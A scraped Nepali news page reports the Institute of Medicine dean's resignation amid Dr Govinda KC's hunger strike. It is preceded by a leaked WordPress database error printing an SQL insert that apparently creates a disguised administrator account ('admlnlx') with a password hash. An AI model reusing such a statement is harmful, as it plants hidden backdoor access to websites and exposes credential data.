WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BsjHwSe756d2kNgvwrESPUk.QxU5Mt.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 18:44:01', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर १७–
चिकित्सा शिक्षा अध्ययन संस्थान (आइओएम)का डिन केपी सिंहले राजीनामा दिनुभएको छ । डिन सिंहले त्रिभुवन विश्वविद्यालयका उपकुलपति तीर्थ खनियासमक्ष आज राजीनामा बुझाउनु भएको हो ।
त्रिभुवन विश्वविद्यालयले उहाँलाई बीस दिनअघि आइओएमको डिनमा नियुक्त गरेको थियो । त्रिविले सिंहलाई डिन नियुक्त गरेकै दिन शिक्षण अस्पतालका बरिष्ठ चिकित्सक गोविन्द केसीले उहाँलाई बर्खास्त गर्नुपर्ने मूख्य मागसहित आमरण अनसन सुरु गर्नुभएको थियो । डा.केसी अझै अनसनमै हुनुहुन्छ । उहाँको अर्को माग त्रिवि उपकुलपति खनियाको राजीनामा बाँकी छ ।
डा.सिंहको राजीनामासंगै डा.केसीको एक माग भने पुरा भएको छ ।